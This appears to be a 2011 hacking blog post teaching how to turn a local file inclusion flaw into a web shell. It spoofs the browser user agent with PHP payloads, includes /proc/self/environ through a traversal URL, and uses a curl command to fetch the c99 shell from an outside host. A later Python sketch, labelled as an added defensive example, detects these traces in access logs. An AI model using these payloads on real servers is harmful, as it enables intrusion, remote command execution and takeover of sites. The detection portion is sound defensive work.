Uploading shell by using LFI

Posted: February 25, 2011 by Hacking & Relax in Skill

1. A site vulnerable to LFI
2. PHP knowledge
3. Mozilla Firefox browser…

So… first you find a site vulnerable to LFI… Now we must check whether there are logs…
They are usually stored in /proc/self/environ, so just replace /etc/passwd with /proc/self/environ.

If you get something like “DOCUMENT_ROOT=…”, it means you successfully found the logs.

Now, on that page you can find something like “HTTP_USER_AGENT”…
This value is usually our user agent (Mozilla, Netscape, etc.), and now we must spoof it… but how?

Open a new tab in Mozilla and type “about:config” (without quotes)…

Now, in “Filter”, type: general.useragent.extra.firefox

You will get something like this:

Preference name                     Status      Type      Value
general.useragent.extra.firefox     default     string    Firefox/3.0.7

Now, double-click on general.useragent.extra.firefox and replace “Firefox/3.0.7” with:

<? include("http://shelladdress.com/c99.txt"); ?>

If everything is good, you will get the shell included… Otherwise, you will get errors… Mostly I was getting the error “URL-File access disabled” or something like that… but using PHP I found another way…

Instead of typing

<? include("http://shelladdress.com/c99.txt"); ?>

as the user agent, type this:

<? passthru($_GET['cmd']); ?>

Then load your vuln page like this:

http://yourvulnsite.com/vulnscript.php?page=../../../proc/self/environ%00?cmd=curl http://shelladress.com/c99.txt -o c99.php

So, let's review… basically, you are just adding the &cmd= parameter at the end of the URL…

Now, using the “curl” command you will get the content of the shell in txt format, and by using -o c99.php you will rename it to c99.php…

Now simply go to your site like this:


And that’s all…

Enjoy, if I helped you, hit the thanks button…
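For defenders, the chain described in this post leaves two visible traces in a web access log: a PHP open tag in a request header, and a request whose include parameter resolves to /proc/self/environ. The following detection sketch is an added example, not part of the original post; the log lines are constructed, and the rule names and the `scan` and `findings` functions are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Combined log format; quoted fields may hold backslash-escaped quotes.
Q = r'"((?:[^"\\]|\\.)*)"'
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] ' + Q + r' (\d{3}) \S+ ' + Q + ' ' + Q + r'\s*$')
SENSITIVE = re.compile(r'/proc/self/environ|/etc/passwd')  # files named on this page
TRAVERSAL = re.compile(r'(?:\.\./){2,}')

def normalize(s, rounds=3):
    """Percent-decode until stable so encoded paths match too."""
    for _ in range(rounds):
        s, prev = unquote(s), s
        if s == prev:
            break
    return s

def findings(line):
    """Return (client_ip, set of rule names) for one log line."""
    m = LINE.match(line)
    if not m:
        return None, {"unparsed"}  # never silently drop lines the parser cannot read
    ip, request, _status, referer, agent = m.groups()
    target = normalize(request)
    checks = {
        "php_in_header": "<?" in agent or "<?" in referer,
        "sensitive_file_in_url": bool(SENSITIVE.search(target)),
        "traversal": bool(TRAVERSAL.search(target)),
        "null_byte": "\x00" in target,
    }
    return ip, {name for name, hit in checks.items() if hit}

def scan(lines):
    """Group by client; header injection plus file inclusion is the full chain."""
    by_ip = defaultdict(set)
    for line in lines:
        ip, hits = findings(line)
        if hits:
            by_ip[ip or "?"] |= hits
    chain = {"php_in_header", "sensitive_file_in_url"}
    return {ip: ("critical" if chain <= h else "review", sorted(h)) for ip, h in by_ip.items()}

# Constructed sample lines (documentation IP ranges), not taken from a real server.
SAMPLE = r'''
198.51.100.7 - - [25/Feb/2011:10:00:01 +0000] "GET /index.php?page=news HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/3.0.7"
203.0.113.9 - - [25/Feb/2011:10:02:11 +0000] "GET /vulnscript.php?page=../../../etc/passwd HTTP/1.1" 200 1833 "-" "Mozilla/5.0 Firefox/3.0.7"
203.0.113.9 - - [25/Feb/2011:10:03:40 +0000] "GET /vulnscript.php?page=../../../proc/self/environ%00 HTTP/1.1" 200 912 "-" "<? passthru($_GET['cmd']); ?>"
not a log line
'''.strip().splitlines()
```

Log matching only surfaces attempts; the underlying fix is to stop passing request parameters to include() and to map them to a fixed allowlist of files instead.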


  1. rlngs4 says:

    if we get nothing when trying /proc/self/environ !
